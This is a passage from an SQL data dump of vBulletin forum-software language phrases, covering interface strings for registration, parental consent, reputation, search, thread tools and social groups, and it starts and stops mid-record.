'select_a_month', 'register', 'Select a month', 'vbulletin', '', 0, ''), (37166, -1, 'sign_form_and_send_with_privacy', 'register', 'Please sign the form below and send it to us.

\r\n I have reviewed the information my child has supplied and I have read the Privacy Policy ({1}) for the web site.\r\n I understand that the profile information may be changed by a using a password.\r\n I understand that I may ask for this registration profile be removed entirely.', 'vbulletin', 'vBulletin Solutions', 1198801110, '3.7.0 Beta 4'), (37167, -1, 'sign_form_and_send_without_privacy', 'register', 'Please sign the form below and send it to us.

\r\n I have reviewed the information my child has supplied.\r\n I understand that the profile information may be changed by a using a password.\r\n I understand that I may ask for this registration profile be removed entirely.', 'vbulletin', 'vBulletin Solutions', 1198801141, '3.7.0 Beta 4'), (37168, -1, 'telephone_number', 'register', 'Telephone Number', 'vbulletin', '', 0, ''), (37169, -1, 'to_post_must_first_register', 'register', 'In order to be able to post messages on the {1} forums, you must first register.
\r\n Please enter your desired user name, your email address and other required details in the form below.', 'vbulletin', '', 0, ''), (37170, -1, 'to_proceed_must_agree', 'register', 'In order to proceed, you must agree with the following rules:', 'vbulletin', '', 0, ''), (37171, -1, 'until_receive_signed_form', 'register', '

Note Until we receive a signed permission form from your parent or guardian you will be unable to post messages on this forum.

\r\n

All of the information you provide on this page will be emailed to you and your parent or guardian with instructions for sending in the approval.

', 'vbulletin', '', 0, ''), (37172, -1, 'username_is_valid', 'register', 'Username is valid and not in use.', 'vbulletin', 'vBulletin Solutions', 1218623657, '3.8.0 Alpha 1'), (37173, -1, 'x_rules', 'register', '{1} Rules', 'vbulletin', '', 0, ''), (37174, -1, 'yes_hides_email_icq_etc', 'register', 'Selecting \'yes\' hides email, ICQ number, AIM ID, Yahoo ID and MSN ID in profile and also hides you in \'Logged In Users\' list.', 'vbulletin', '', 0, ''), (37175, -1, 'add_new_reputation_level', 'reputation', 'Add New Reputation Level', 'vbulletin', '', 0, ''), (37176, -1, 'add_to_reputation', 'reputation', 'Add to Reputation', 'vbulletin', '', 0, ''), (37177, -1, 'are_you_sure_want_to_delete_reputation_x', 'reputation', 'Are you sure you want to delete reputation {1}?', 'vbulletin', '', 0, ''), (37178, -1, 'are_you_sure_you_want_to_delete_the_reputation_level_x', 'reputation', 'Are you sure you want to delete the Reputation Level: \'{1}\'?', 'vbulletin', '', 0, ''), (37179, -1, 'comments_on_this_post', 'reputation', 'Comments on this Post', 'vbulletin', '', 0, ''), (37180, -1, 'edit_reputation', 'reputation', 'Edit Reputation', 'vbulletin', '', 0, ''), (37181, -1, 'even', 'reputation', 'Even', 'vbulletin', '', 0, ''), (37182, -1, 'extremely_negative', 'reputation', 'Extremely Negative', 'vbulletin', '', 0, ''), (37183, -1, 'extremely_positive', 'reputation', 'Extremely Positive', 'vbulletin', '', 0, ''), (37184, -1, 'i_approve', 'reputation', 'I approve', 'vbulletin', '', 0, ''), (37185, -1, 'i_disapprove', 'reputation', 'I disapprove', 'vbulletin', '', 0, ''), (37186, -1, 'leftby', 'reputation', 'Left By', 'vbulletin', '', 0, ''), (37187, -1, 'leftfor', 'reputation', 'Left For', 'vbulletin', '', 0, ''), (37188, -1, 'minimum_reputation_level', 'reputation', 'Minimum Reputation Level', 'vbulletin', '', 0, ''), (37189, -1, 'negative', 'reputation', 'Negative', 'vbulletin', '', 0, ''), (37190, -1, 'positive', 'reputation', 'Positive', 'vbulletin', '', 0, ''), (37191, -1, 'reputation_on_post_is_x', 'reputation', 'Your reputation on this post is {2}.', 'vbulletin', '', 0, ''), (37192, -1, 'somewhat_negative', 'reputation', 'Somewhat Negative', 'vbulletin', '', 0, ''), (37193, -1, 'somewhat_positive', 'reputation', 'Somewhat Positive', 'vbulletin', '', 0, ''), (37194, -1, 'user_reputation_manager', 'reputation', 'User Reputation Manager', 'vbulletin', '', 0, ''), (37195, -1, 'very_negative', 'reputation', 'Very Negative', 'vbulletin', '', 0, ''), (37196, -1, 'very_positive', 'reputation', 'Very Positive', 'vbulletin', '', 0, ''), (37197, -1, 'what_do_you_think_of_xs_post', 'reputation', 'What do you think of {1}\'s post?', 'vbulletin', '', 0, ''), (37198, -1, 'x_reputation_comments_page_y_z', 'reputation', '{1} Reputation Comments (Page {2}/{3})', 'vbulletin', '', 0, ''), (37199, -1, 'you_have_x_reputation_points', 'reputation', 'You have {1} Reputation point(s).', 'vbulletin', 'vBulletin Solutions', 1149791689, '3.6.0 Beta 2'), (37200, -1, 'your_comments_on_this_post', 'reputation', 'Your comments on this post', 'vbulletin', '', 0, ''), (37201, -1, 'a_month_ago', 'search', 'A Month Ago', 'vbulletin', '', 0, ''), (37202, -1, 'a_week_ago', 'search', 'A Week Ago', 'vbulletin', '', 0, ''), (37203, -1, 'a_year_ago', 'search', 'A Year Ago', 'vbulletin', '', 0, ''), (37204, -1, 'all_posts_below_here', 'search', 'All posts below here were posted before your last visit.', 'vbulletin', '', 0, ''), (37205, -1, 'all_threads_below_here', 'search', 'The threads below have not been updated since your last visit or since forums have been marked read.', 'vbulletin', 'vBulletin Solutions', 1149792250, '3.6.0 Beta 2'), (37206, -1, 'all_threads_below_here_unread', 'search', 'The threads below have not been updated since your last visit but still contain unread posts.', 'vbulletin', 'vBulletin Solutions', 1149792248, '3.6.0 Beta 2'), (37207, -1, 'also_search_in_child_forums', 'search', 'Also search in child forums', 'vbulletin', '', 0, ''), (37208, -1, 'and_child_forums', 'search', 'and child forums', 'vbulletin', '', 0, ''), (37209, -1, 'and_newer', 'search', 'and Newer', 'vbulletin', '', 0, ''), (37210, -1, 'and_older', 'search', 'and Older', 'vbulletin', '', 0, ''), (37211, -1, 'any_date', 'search', 'Any Date', 'vbulletin', '', 0, ''), (37212, -1, 'at_least', 'search', 'At Least', 'vbulletin', '', 0, ''), (37213, -1, 'at_most', 'search', 'At Most', 'vbulletin', '', 0, ''), (37214, -1, 'clear_search_preferences', 'search', 'Clear Search Preferences', 'vbulletin', '', 0, ''), (37215, -1, 'deleted_post', 'search', 'Deleted Post', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (37216, -1, 'do_not_use_cached_results', 'search', 'Do not use cached results', 'vbulletin', 'vBulletin Solutions', 1172491139, '3.6.5'), (37217, -1, 'errors_occured_with_search', 'search', 'The following errors occurred with your search', 'vbulletin', 'vBulletin Solutions', 1155581034, '3.6.1'), (37218, -1, 'exact_name', 'search', 'Exact name', 'vbulletin', '', 0, ''), (37219, -1, 'fields_on_form_optional', 'search', 'All fields on this form are optional. Most fields will accept a partial input (for example, you could enter Jo into the \'User Name\' field in order to find users called John, Joe, Joseph and Jolene).', 'vbulletin', '', 0, ''), (37220, -1, 'find_posts_from', 'search', 'Find Posts from', 'vbulletin', '', 0, ''), (37221, -1, 'find_threads_started_by_user', 'search', 'Find Threads Started by User', 'vbulletin', '', 0, ''), (37222, -1, 'find_threads_with', 'search', 'Find Threads with', 'vbulletin', '', 0, ''), (37223, -1, 'find_threads_with_prefix', 'search', 'Find Threads with Prefix', 'vbulletin', 'vBulletin Solutions', 1190042608, '3.7.0 Beta 1'), (37224, -1, 'help', 'search', 'Help', 'vbulletin', '', 0, ''), (37225, -1, 'in_ascending_order', 'search', 'in Ascending Order', 'vbulletin', '', 0, ''), (37226, -1, 'in_descending_order', 'search', 'in Descending Order', 'vbulletin', '', 0, ''), (37227, -1, 'is_after', 'search', 'is After', 'vbulletin', '', 0, ''), (37228, -1, 'is_before', 'search', 'is Before', 'vbulletin', '', 0, ''), (37229, -1, 'is_greater_than_or_equal_to', 'search', 'is Greater than or Equal to', 'vbulletin', '', 0, ''), (37230, -1, 'is_less_than', 'search', 'is Less than', 'vbulletin', '', 0, ''), (37231, -1, 'key_words', 'search', 'Keyword(s)', 'vbulletin', 'vBulletin Solutions', 1213632802, '3.8.0 Alpha 1'), (37232, -1, 'last_posting_date', 'search', 'Last Posting Date', 'vbulletin', '', 0, ''), (37233, -1, 'moderated_post', 'search', 'Moderated Post', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (37234, -1, 'moderation', 'search', 'Moderation', 'vbulletin', '', 0, ''), (37235, -1, 'no_unread_threads', 'search', 'There are no unread threads.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (37236, -1, 'number_of_users_perpage', 'search', 'Number of users per-page', 'vbulletin', '', 0, ''), (37237, -1, 'or_no_prefix', 'search', 'or no prefix', 'vbulletin', 'vBulletin Solutions', 1190042552, '3.7.0 Beta 1'), (37238, -1, 'order_results_by', 'search', 'Order Results By', 'vbulletin', '', 0, ''), (37239, -1, 'please_use_format', 'search', 'Please use yyyy-mm-dd format', 'vbulletin', '', 0, ''), (37240, -1, 'please_use_format_yyyymmdd_hhmmss', 'search', 'Please use format yyyy-mm-dd hh:mm:ss', 'vbulletin', '', 0, ''), (37241, -1, 'posts_from_last_day', 'search', 'Posts From Last Day', 'vbulletin', '', 0, ''), (37242, -1, 'posts_made_by', 'search', 'Posts Made By', 'vbulletin', '', 0, ''), (37243, -1, 'relevancy', 'search', 'Relevancy', 'vbulletin', '', 0, ''), (37244, -1, 'save_search_preferences', 'search', 'Save Search Preferences', 'vbulletin', '', 0, ''), (37245, -1, 'search_all_open_forums', 'search', 'Search All Open Forums', 'vbulletin', '', 0, ''), (37246, -1, 'search_by_key_word', 'search', 'Search by Keyword', 'vbulletin', 'vBulletin Solutions', 1213632822, '3.8.0 Alpha 1'), (37247, -1, 'search_by_tag', 'search', 'Search by Tag', 'vbulletin', 'vBulletin Solutions', 1190904527, '3.7.0 Beta 1'), (37248, -1, 'search_by_user_name', 'search', 'Search by User Name', 'vbulletin', '', 0, ''), (37249, -1, 'search_entire_posts', 'search', 'Search Entire Posts', 'vbulletin', '', 0, ''), (37250, -1, 'search_in_forums', 'search', 'Search in Forum(s)', 'vbulletin', '', 0, ''), (37251, -1, 'search_now', 'search', 'Search Now', 'vbulletin', '', 0, ''), (37252, -1, 'search_options', 'search', 'Search Options', 'vbulletin', '', 0, ''), (37253, -1, 'search_subscribed_forums', 'search', 'Search Subscribed Forums', 'vbulletin', '', 0, ''), (37254, -1, 'search_tag_cloud', 'search', 'Search Tag Cloud', 'vbulletin', 'vBulletin Solutions', 1191579522, '3.7.0 Beta 1'), (37255, -1, 'search_thread', 'search', 'Search Thread', 'vbulletin', 'vBulletin Solutions', 1156452931, '3.6.1'), (37256, -1, 'search_took_x_seconds', 'search', 'Search took {1} seconds.', 'vbulletin', '', 0, ''), (37257, -1, 'search_took_x_seconds_gen_y_mins', 'search', 'Search took {1} seconds; generated {2} minute(s) ago.', 'vbulletin', '', 0, ''), (37258, -1, 'search_type', 'search', 'Search Type', 'vbulletin', '', 0, ''), (37259, -1, 'show_results_as', 'search', 'Show Results as', 'vbulletin', '', 0, ''), (37260, -1, 'sort_results_by', 'search', 'Sort Results by', 'vbulletin', '', 0, ''), (37261, -1, 'spam_post', 'search', 'Spam Post', 'vbulletin', 'vBulletin Solutions', 1193049740, '3.7.0 Beta 1'), (37262, -1, 'tag_cloud', 'search', 'Tag Cloud', 'vbulletin', 'vBulletin Solutions', 1196698375, '3.7.0 Beta 1'), (37263, -1, 'these_are_the_x_most_searched_thread_tags', 'search', 'These are the {1} most-searched-for thread tags', 'vbulletin', 'vBulletin Solutions', 1191588641, '3.7.0 Beta 1'), (37264, -1, 'these_are_the_x_most_used_thread_tags', 'search', 'These are the {1} most used thread tags', 'vbulletin', 'vBulletin Solutions', 1196698517, '3.7.0 Beta 1'), (37265, -1, 'thread_start_date', 'search', 'Thread Start Date', 'vbulletin', '', 0, ''), (37266, -1, 'thread_titles_only_search', 'search', 'You may return further results if you perform a Thread Titles Only search.', 'vbulletin', 'vBulletin Solutions', 1170375631, '3.6.5'), (37267, -1, 'threads_started_by', 'search', 'Threads Started By', 'vbulletin', '', 0, ''), (37268, -1, 'threads_tagged_with_x', 'search', 'Threads Tagged with {1}', 'vbulletin', 'vBulletin Solutions', 1203428241, '3.7.0 Beta 6'), (37269, -1, 'threads_tagged_with_x_title', 'search', 'Threads Tagged with {1}', 'vbulletin', 'vBulletin Solutions', 1205146769, '3.7.0 Release Candidate 1'), (37270, -1, 'words_very_common', 'search', 'The following words are either very common, too long, or too short and were not included in your search', 'vbulletin', '', 0, ''), (37271, -1, 'x_deleted_posts', 'search', '{1} Deleted Post(s)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (37272, -1, 'x_moderated_posts', 'search', '{1} Moderated Post(s)', 'vbulletin', '', 0, ''), (37273, -1, 'x_months_ago', 'search', '{1} Months Ago', 'vbulletin', '', 0, ''), (37274, -1, 'you_can_only_search_thread_titles', 'search', 'You can only search in thread titles in the forums marked with an *. Please select \'Search Thread Titles Only\' to include these forums in your search.', 'vbulletin', 'vBulletin Solutions', 1170366080, '3.6.5'), (37275, -1, 'your_last_visit', 'search', 'Your Last Visit', 'vbulletin', '', 0, ''), (37276, -1, 'add_a_poll', 'showthread', 'Add a Poll', 'vbulletin', '', 0, ''), (37277, -1, 'add_a_poll_to_this_thread', 'showthread', 'Add a Poll to this Thread', 'vbulletin', '', 0, ''), (37278, -1, 'admin_tools', 'showthread', 'Moderation Tools', 'vbulletin', 'vBulletin Solutions', 1147889560, '3.6.0 Beta 1'), (37279, -1, 'already_rated_this_thread', 'showthread', 'You have already rated this thread', 'vbulletin', '', 0, ''), (37280, -1, 'approve_thread', 'showthread', 'Approve Thread', 'vbulletin', 'vBulletin Solutions', 1212676405, '3.8.0 Alpha 1'), (37281, -1, 'average', 'showthread', 'Average', 'vbulletin', '', 0, ''), (37282, -1, 'bad', 'showthread', 'Bad', 'vbulletin', '', 0, ''), (37283, -1, 'bookmarks', 'showthread', 'Bookmarks', 'vbulletin', 'vBulletin Solutions', 1214395154, '3.7.1'), (37284, -1, 'choose_a_rating', 'showthread', 'Choose a rating', 'vbulletin', '', 0, ''), (37285, -1, 'click_quick_reply_icon', 'showthread', 'Please click one of the Quick Reply icons in the posts above to activate Quick Reply.', 'vbulletin', '', 0, ''), (37286, -1, 'close_thread', 'showthread', 'Close Thread', 'vbulletin', '', 0, ''), (37287, -1, 'copy_thread', 'showthread', 'Copy Thread', 'vbulletin', 'vBulletin Solutions', 1151447312, '3.6.0 Beta 4'), (37288, -1, 'deleted_post', 'showthread', 'Deleted Post', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (37289, -1, 'display_modes', 'showthread', 'Display Modes', 'vbulletin', '', 0, ''), (37290, -1, 'email_this_page', 'showthread', 'Email this Page', 'vbulletin', '', 0, ''), (37291, -1, 'excellent', 'showthread', 'Excellent', 'vbulletin', '', 0, ''), (37292, -1, 'good', 'showthread', 'Good', 'vbulletin', '', 0, ''), (37293, -1, 'hybrid_mode', 'showthread', 'Hybrid Mode', 'vbulletin', '', 0, ''), (37294, -1, 'linear_mode', 'showthread', 'Linear Mode', 'vbulletin', '', 0, ''), (37295, -1, 'moderated_post', 'showthread', 'Moderated Post', 'vbulletin', '', 0, ''), (37296, -1, 'moderation', 'showthread', 'Moderation', 'vbulletin', '', 0, ''), (37297, -1, 'more_replies_below', 'showthread', 'More replies below current depth...', 'vbulletin', '', 0, ''), (37298, -1, 'move_thread', 'showthread', 'Move Thread', 'vbulletin', 'vBulletin Solutions', 1151447322, '3.6.0 Beta 4'), (37299, -1, 'next_post', 'showthread', 'Next Post', 'vbulletin', '', 0, ''), (37300, -1, 'next_thread', 'showthread', 'Next Thread', 'vbulletin', '', 0, ''), (37301, -1, 'open_thread', 'showthread', 'Open Thread', 'vbulletin', '', 0, ''), (37302, -1, 'post_deleted', 'showthread', '(Post Deleted)', 'vbulletin', '', 0, ''), (37303, -1, 'post_quick_reply', 'showthread', 'Post Quick Reply', 'vbulletin', '', 0, ''), (37304, -1, 'posting_quick_reply_please_wait', 'showthread', 'Posting Quick Reply - Please Wait', 'vbulletin', '', 0, ''), (37305, -1, 'prev_thread', 'showthread', 'Previous Thread', 'vbulletin', '', 0, ''), (37306, -1, 'previous_post', 'showthread', 'Previous Post', 'vbulletin', '', 0, ''), (37307, -1, 'quote_message_in_reply', 'showthread', 'Quote message in reply?', 'vbulletin', '', 0, ''), (37308, -1, 'rate_this_thread', 'showthread', 'Rate This Thread', 'vbulletin', '', 0, ''), (37309, -1, 'rating', 'showthread', 'Rating', 'vbulletin', '', 0, ''), (37310, -1, 'remove_redirects', 'showthread', 'Remove Redirects', 'vbulletin', '', 0, ''), (37311, -1, 'remove_text_formatting', 'showthread', 'Remove Text Formatting', 'vbulletin', '', 0, ''), (37312, -1, 'search_this_thread', 'showthread', 'Search this Thread', 'vbulletin', '', 0, ''), (37313, -1, 'show_printable_version', 'showthread', 'Show Printable Version', 'vbulletin', '', 0, ''), (37314, -1, 'show_x_posts_on_one_page', 'showthread', 'Show {1} post(s) from this thread on one page', 'vbulletin', 'vBulletin Solutions', 1150509194, '3.6.0 Beta 3'), (37315, -1, 'show_your_signature', 'showthread', 'Show your signature', 'vbulletin', '', 0, ''), (37316, -1, 'similar_threads', 'showthread', 'Similar Threads', 'vbulletin', '', 0, ''), (37317, -1, 'spam_post', 'showthread', 'Spam Post', 'vbulletin', 'vBulletin Solutions', 1193049715, '3.7.0 Beta 1'), (37318, -1, 'split_thread', 'showthread', 'Split Thread', 'vbulletin', '', 0, ''), (37319, -1, 'stick_thread', 'showthread', 'Stick Thread', 'vbulletin', '', 0, ''), (37320, -1, 'submit_thread_to_x', 'showthread', 'Submit Thread to {1}', 'vbulletin', 'vBulletin Solutions', 1210106330, '3.7.1'), (37321, -1, 'subscribe_to_this_thread', 'showthread', 'Subscribe to this Thread', 'vbulletin', '', 0, ''), (37322, -1, 'switch_to_hybrid_mode', 'showthread', 'Switch to Hybrid Mode', 'vbulletin', '', 0, ''), (37323, -1, 'switch_to_linear_mode', 'showthread', 'Switch to Linear Mode', 'vbulletin', '', 0, ''), (37324, -1, 'switch_to_threaded_mode', 'showthread', 'Switch to Threaded Mode', 'vbulletin', '', 0, ''), (37325, -1, 'terrible', 'showthread', 'Terrible', 'vbulletin', '', 0, ''), (37326, -1, 'thread_tools', 'showthread', 'Thread Tools', 'vbulletin', '', 0, ''), (37327, -1, 'threaded_mode', 'showthread', 'Threaded Mode', 'vbulletin', '', 0, ''), (37328, -1, 'unapprove_thread', 'showthread', 'Unapprove Thread', 'vbulletin', 'vBulletin Solutions', 1212676426, '3.8.0 Alpha 1'), (37329, -1, 'unstick_thread', 'showthread', 'Unstick Thread', 'vbulletin', '', 0, ''), (37330, -1, 'unsubscribe_from_this_thread', 'showthread', 'Unsubscribe from this Thread', 'vbulletin', '', 0, ''), (37331, -1, 'users_viewing_this_thread_x_y_z', 'showthread', 'Currently Active Users Viewing This Thread: {1} ({2} members and {3} guests)', 'vbulletin', '', 0, ''), (37332, -1, 'view_first_unread', 'showthread', 'View First Unread', 'vbulletin', '', 0, ''), (37333, -1, 'view_single_post', 'showthread', 'View Single Post', 'vbulletin', '', 0, ''), (37334, -1, 'you_rated_this_thread', 'showthread', 'You Rated this Thread', 'vbulletin', '', 0, ''), (37335, -1, 'accept_social_group_transfer_x', 'socialgroups', 'You have been requested to take ownership of the Social Group {1}.

\r\nWould you like to accept?', 'vbulletin', 'vBulletin Solutions', 1221138461, '3.8.0 Alpha 1'), (37336, -1, 'add_new_category', 'socialgroups', 'Add New Category', 'vbulletin', 'vBulletin Solutions', 1215686846, '3.8.0 Alpha 1'), (37337, -1, 'add_new_socialgroup_category', 'socialgroups', 'Add New Social Group Category', 'vbulletin', 'vBulletin Solutions', 1215685687, '3.8.0 Alpha 1'), (37338, -1, 'add_pictures_to_group', 'socialgroups', 'Add Pictures to Group', 'vbulletin', 'vBulletin Solutions', 1195470031, '3.7.0 Beta 1'), (37339, -1, 'add_pictures_to_this_group', 'socialgroups', 'Add pictures to this group!', 'vbulletin', 'vBulletin Solutions', 1195494188, '3.7.0 Beta 1'), (37340, -1, 'all_groups', 'socialgroups', 'All Groups', 'vbulletin', 'vBulletin Solutions', 1217935791, '3.8.0 Alpha 1'), (37341, -1, 'approve_discussions', 'socialgroups', 'Approve Discussions', 'vbulletin', 'vBulletin Solutions', 1212160014, '3.7.1'), (37342, -1, 'are_you_sure_you_want_to_delete_category_x_y_groups', 'socialgroups', 'Are you sure you want to delete the social group category {1}?

\r\nIf you choose to delete this category, you must choose a different category into which the {2} social groups belonging to the {1} category will be moved.', 'vbulletin', 'vBulletin Solutions', 1215703760, '3.8.0 Alpha 1'), (37343, -1, 'are_you_sure_you_want_to_delete_x_groups', 'socialgroups', 'Are you sure you want to delete {1} group(s)?', 'vbulletin', 'vBulletin Solutions', 1200321733, '3.7.0 Beta 4'), (37344, -1, 'available_groups', 'socialgroups', 'Available Groups', 'vbulletin', 'vBulletin Solutions', 1192453518, '3.7.0 Beta 1'), (37345, -1, 'bookmarks', 'socialgroups', 'Bookmarks', 'vbulletin', 'vBulletin Solutions', 1214395214, '3.7.1'), (37346, -1, 'cancel_invitation', 'socialgroups', 'Cancel Invitation', 'vbulletin', 'vBulletin Solutions', 1196252843, '3.7.0 Beta 1'), (37347, -1, 'cancel_join_request', 'socialgroups', 'Cancel Join Request', 'vbulletin', 'vBulletin Solutions', 1196173474, '3.7.0 Beta 1'), (37348, -1, 'cancel_join_request_question', 'socialgroups', 'Cancel Join Request?', 'vbulletin', 'vBulletin Solutions', 1196173412, '3.7.0 Beta 1'), (37349, -1, 'categories', 'socialgroups', 'Categories', 'vbulletin', 'vBulletin Solutions', 1217858812, '3.8.0 Alpha 1'), (37350, -1, 'category', 'socialgroups', 'Category', 'vbulletin', 'vBulletin Solutions', 1218119234, '3.8.0 Alpha 1'), (37351, -1, 'category_filter', 'socialgroups', 'Category Filter', 'vbulletin', 'vBulletin Solutions', 1215787541, '3.8.0 Alpha 1'), (37352, -1, 'category_is', 'socialgroups', 'Category is', 'vbulletin', 'vBulletin Solutions', 1215685588, '3.8.0 Alpha 1'), (37353, -1, 'category_name', 'socialgroups', 'Category Name', 'vbulletin', 'vBulletin Solutions', 1217946386, '3.8.0 Alpha 1'), (37354, -1, 'confirm_cancel_join_group_x', 'socialgroups', 'Are you sure you wish to cancel your request to join the group \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1196173337, '3.7.0 Beta 1'), (37355, -1, 'confirm_decline_join_group_x', 'socialgroups', 'Are you sure you wish to decline the invitation to join the group \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1196173891, '3.7.0 Beta 1'), (37356, -1, 'confirm_delete_group_x', 'socialgroups', 'Are you sure you want to delete the group called \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1193231255, '3.7.0 Beta 1'), (37357, -1, 'confirm_join_group_x', 'socialgroups', 'Are you sure you want to join the group called \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1193231276, '3.7.0 Beta 1'), (37358, -1, 'confirm_leave_group_x', 'socialgroups', 'Are you sure you wish to leave the group called \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1193231308, '3.7.0 Beta 1'), (37359, -1, 'confirm_remove_picture_group_x', 'socialgroups', 'Are you sure you want to remove this picture from the group \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1195471587, '3.7.0 Beta 1'), (37360, -1, 'create_a_new_group', 'socialgroups', 'Create a New Group', 'vbulletin', 'vBulletin Solutions', 1193675620, '3.7.0 Beta 1'), (37361, -1, 'create_group', 'socialgroups', 'Create Group', 'vbulletin', 'vBulletin Solutions', 1192529892, '3.7.0 Beta 1'), (37362, -1, 'create_group_icon', 'socialgroups', 'Create Group Icon', 'vbulletin', 'vBulletin Solutions', 1226322443, '3.8.0 Beta 2'), (37363, -1, 'creation_date_filter', 'socialgroups', 'Creation Date Filter', 'vbulletin', 'vBulletin Solutions', 1193144709, '3.7.0 Beta 1'), (37364, -1, 'creation_date_is_after', 'socialgroups', 'Creation Date is After', 'vbulletin', 'vBulletin Solutions', 1200321815, '3.7.0 Beta 4'), (37365, -1, 'creation_date_is_before', 'socialgroups', 'Creation Date is Before', 'vbulletin', 'vBulletin Solutions', 1200321829, '3.7.0 Beta 4'), (37366, -1, 'current_group_icon', 'socialgroups', 'Current Group Icon', 'vbulletin', 'vBulletin Solutions', 1216132835, '3.8.0 Alpha 1'), (37367, -1, 'custom_group_icon', 'socialgroups', 'Custom Group Icon', 'vbulletin', 'vBulletin Solutions', 1216133252, '3.8.0 Alpha 1'), (37368, -1, 'date_is_after', 'socialgroups', 'Date is after', 'vbulletin', 'vBulletin Solutions', 1193144762, '3.7.0 Beta 1'), (37369, -1, 'date_is_before', 'socialgroups', 'Date is Before', 'vbulletin', 'vBulletin Solutions', 1193144742, '3.7.0 Beta 1'), (37370, -1, 'decline_join_invitation', 'socialgroups', 'Decline Invitation', 'vbulletin', 'vBulletin Solutions', 1196173921, '3.7.0 Beta 1'), (37371, -1, 'decline_join_invitation_question', 'socialgroups', 'Decline Invitation?', 'vbulletin', 'vBulletin Solutions', 1196173929, '3.7.0 Beta 1'), (37372, -1, 'delete_discussion', 'socialgroups', 'Delete Discussion', 'vbulletin', 'vBulletin Solutions', 1214231861, '3.7.1'), (37373, -1, 'delete_discussion_check_appropriate_option', 'socialgroups', 'To delete this discussion, check the appropriate option below and then click the \'Delete this Message\' button.', 'vbulletin', 'vBulletin Solutions', 1214231666, '3.7.1'), (37374, -1, 'delete_discussions', 'socialgroups', 'Delete Discussions', 'vbulletin', 'vBulletin Solutions', 1212159933, '3.7.1'), (37375, -1, 'delete_group', 'socialgroups', 'Delete Group', 'vbulletin', 'vBulletin Solutions', 1192467324, '3.7.0 Beta 1'), (37376, -1, 'delete_group_discussion', 'socialgroups', 'Delete Discussion', 'vbulletin', 'vBulletin Solutions', 1211468780, '3.7.1'), (37377, -1, 'delete_group_question', 'socialgroups', 'Delete Group?', 'vbulletin', 'vBulletin Solutions', 1195748188, '3.7.0 Beta 1'), (37378, -1, 'delete_selected_groups', 'socialgroups', 'Delete Selected Groups', 'vbulletin', 'vBulletin Solutions', 1200321848, '3.7.0 Beta 4'), (37379, -1, 'deleted_selected_groups', 'socialgroups', 'Deleted Selected Groups', 'vbulletin', 'vBulletin Solutions', 1200321887, '3.7.0 Beta 4'), (37380, -1, 'deleting_groups', 'socialgroups', 'Deleting groups', 'vbulletin', 'vBulletin Solutions', 1200321901, '3.7.0 Beta 4'), (37381, -1, 'deleting_x', 'socialgroups', 'Deleting {1}...', 'vbulletin', 'vBulletin Solutions', 1200321915, '3.7.0 Beta 4'), (37382, -1, 'deselect_all_discussions', 'socialgroups', 'Deselect All Discussions', 'vbulletin', 'vBulletin Solutions', 1212160125, '3.7.1'), (37383, -1, 'discussion', 'socialgroups', 'Discussion', 'vbulletin', 'vBulletin Solutions', 1211468747, '3.7.1'), (37384, -1, 'discussion_deleted_by_x', 'socialgroups', 'Discussion deleted by {2}.', 'vbulletin', 'vBulletin Solutions', 1212669929, '3.7.1'), (37385, -1, 'discussion_hidden_x_on_ignore_list', 'socialgroups', 'This discussion is hidden because {1} is on your ignore list.', 'vbulletin', 'vBulletin Solutions', 1212079329, '3.7.1'), (37386, -1, 'discussion_tools', 'socialgroups', 'Discussion Tools', 'vbulletin', 'vBulletin Solutions', 1213619883, '3.7.1'), (37387, -1, 'do_not_delete_discussion', 'socialgroups', 'Do Not Delete Discussion', 'vbulletin', 'vBulletin Solutions', 1214231843, '3.7.1'), (37388, -1, 'doleave', 'socialgroups', 'Leave Group?', 'vbulletin', 'vBulletin Solutions', 1192466920, '3.7.0 Beta 1'), (37389, -1, 'edit_discussion', 'socialgroups', 'Edit Discussion', 'vbulletin', 'vBulletin Solutions', 1221755235, '3.8.0 Alpha 1'), (37390, -1, 'edit_group', 'socialgroups', 'Edit Group', 'vbulletin', 'vBulletin Solutions', 1192534753, '3.7.0 Beta 1'), (37391, -1, 'edit_group_icon', 'socialgroups', 'Edit Group Icon', 'vbulletin', 'vBulletin Solutions', 1216132803, '3.8.0 Alpha 1'), (37392, -1, 'edit_message', 'socialgroups', 'Edit Message', 'vbulletin', 'vBulletin Solutions', 1221755189, '3.8.0 Alpha 1'), (37393, -1, 'enable_albums', 'socialgroups', 'Enable Albums', 'vbulletin', 'vBulletin Solutions', 1204717794, '3.7.0 Beta 6'), (37394, -1, 'enable_messages', 'socialgroups', 'Enable Messages', 'vbulletin', 'vBulletin Solutions', 1204718022, '3.7.0 Beta 6'), (37395, -1, 'filter', 'socialgroups', 'Filter', 'vbulletin', 'vBulletin Solutions', 1193227281, '3.7.0 Beta 1'), (37396, -1, 'find_groups_with', 'socialgroups', 'Find Groups With', 'vbulletin', 'vBulletin Solutions', 1193144843, '3.7.0 Beta 1'), (37397, -1, 'following_urls_invalid_picture_not_found', 'socialgroups', 'The following URLs were invalid. The specified picture could not be found or did not come from your albums.', 'vbulletin', 'vBulletin Solutions', 1195493961, '3.7.0 Beta 1'), (37398, -1, 'from_x', 'socialgroups', 'From {3}', 'vbulletin', 'vBulletin Solutions', 1196493906, '3.7.0 Beta 1'), (37399, -1, 'group_created', 'socialgroups', 'Created', 'vbulletin', 'vBulletin Solutions', 1192454348, '3.7.0 Beta 1'), (37400, -1, 'group_created_by', 'socialgroups', 'Group Created By', 'vbulletin', 'vBulletin Solutions', 1224674639, '3.8.0 Beta 2'), (37401, -1, 'group_desc_inviteonly', 'socialgroups', 'This is an invite only group.', 'vbulletin', 'vBulletin Solutions', 1196948658, '3.7.0 Beta 1'), (37402, -1, 'group_desc_moderated', 'socialgroups', 'This is a moderated group.', 'vbulletin', 'vBulletin Solutions', 1196948641, '3.7.0 Beta 1'), (37403, -1, 'group_desc_public', 'socialgroups', 'This is a public group.', 'vbulletin', 'vBulletin Solutions', 1196948629, '3.7.0 Beta 1'), (37404, -1, 'group_description', 'socialgroups', 'Group 